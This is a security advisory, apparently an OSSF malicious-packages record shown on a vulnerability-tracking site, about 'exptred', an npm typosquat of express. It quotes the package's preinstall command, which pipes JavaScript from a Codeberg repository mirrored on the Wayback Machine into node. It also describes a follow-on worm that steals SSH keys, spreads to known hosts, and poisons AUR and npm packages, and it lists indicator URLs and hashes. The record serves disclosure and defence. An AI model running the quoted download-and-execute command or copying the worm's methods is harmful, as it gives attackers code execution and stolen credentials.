mal-2026-17246
Vulnerability from ossf_malicious_packages
The package exptred impersonates the legitimate 'express' package (it republishes express's package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account 'dirtyblanket' (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.
On Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named "Font Rendering Service" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (d91842ab3e5c93f5689a985b63f8de5455910d88d6815ee35f2d35d27f8a4cf7)
npm package exptred@5.2.1 is a typosquat of express: package.json copies express's description ('Fast, unopinionated, minimalist web framework'), author (TJ Holowaychuk), repository (expressjs/express), and homepage (expressjs.com), and index.js re-exports lib/express. The tarball adds a preinstall lifecycle script that pipes remote JavaScript into node: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/... | node. On npm install, whatever bytes the web.archive.org-proxied Codeberg branch currently returns are executed on the installer's host. The source is a personal Codeberg user's raw branch content — mutable, non-publisher, unpinned, and integrity-unchecked — so the operator of that branch controls arbitrary code execution on every machine that installs the package.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "package.json",
"sha256": "9e8a19929535f0c5f1a183166354fe3a3a5a0d492a58fbe68823cca0f5ac8498",
"tlsh": "d751da21cc0e8c6326c5a2dd3c68a542612188078e41f81cf769539c8f8e52f71b9fbf"
}
],
"package_integrity": [
{
"filename": "exptred-5.2.1.tgz",
"hashes": {
"sha1": "e24f6b5543006e0ae68be510b3513abd9579cf43",
"sha512_sri": "sha512-AQMYnjWtWs57EmuFXNticiFqhjSKj4dk5TSOdLU+26miItqLDRS0V18kp9YTDJ1Rp2XLjfRZ6nvCLN6VqxeewQ=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "exptred"
},
"versions": [
"5.2.1"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"name": "Pranesh, InvisiRisk",
"type": "FINDER"
},
{
"contact": [
"https://safedep.io"
],
"name": "SafeDep",
"type": "FINDER"
}
],
"database_specific": {
"iocs": {
"files": [
{
"note": "preinstall script pipes the web.archive.org copy of node.js into node.",
"paths": [
"package.json"
],
"source": "PACKAGE_ARCHIVE"
},
{
"digests": {
"sha256": "65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577"
},
"note": "Stage two Bash worm, piped from curl into bash.",
"paths": [
"linux.sh"
],
"source": "IN_MEMORY"
},
{
"digests": {
"sha256": "2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2"
},
"note": "systemd-fontd, a stripped Go ELF x86-64 binary run as the \"Font Rendering Service\" systemd service. First path as root, second path without root.",
"paths": [
"/usr/lib/systemd/systemd-fontrenderd",
"~/.config/systemd/systemd-fontcached"
],
"source": "DROPPED"
}
],
"urls": [
"https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
"https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
"https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh",
"https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/systemd-fontd"
]
},
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020628",
"import_time": "2026-09-29T14:44:37.233841374Z",
"modified_time": "2026-09-29T14:39:46Z",
"sha256": "d91842ab3e5c93f5689a985b63f8de5455910d88d6815ee35f2d35d27f8a4cf7",
"source": "amazon-inspector",
"versions": [
"5.2.1"
]
}
]
},
"details": "The package exptred impersonates the legitimate \u0027express\u0027 package (it republishes express\u0027s package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account \u0027dirtyblanket\u0027 (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.\n\nOn Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named \"Font Rendering Service\" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d91842ab3e5c93f5689a985b63f8de5455910d88d6815ee35f2d35d27f8a4cf7)\nnpm package `exptred@5.2.1` is a typosquat of `express`: package.json copies express\u0027s description (\u0027Fast, unopinionated, minimalist web framework\u0027), author (TJ Holowaychuk), repository (expressjs/express), and homepage (expressjs.com), and index.js re-exports lib/express. The tarball adds a `preinstall` lifecycle script that pipes remote JavaScript into `node`: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/... | node`. On `npm install`, whatever bytes the web.archive.org-proxied Codeberg branch currently returns are executed on the installer\u0027s host. The source is a personal Codeberg user\u0027s raw branch content \u2014 mutable, non-publisher, unpinned, and integrity-unchecked \u2014 so the operator of that branch controls arbitrary code execution on every machine that installs the package.\n",
"id": "MAL-2026-17246",
"modified": "2026-10-01T08:00:00Z",
"published": "2026-09-29T07:12:49Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/exptred/v/5.2.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/exptred"
},
{
"type": "REPORT",
"url": "https://safedep.io/dirtyblanket-express-impersonation-npm/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in exptred (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.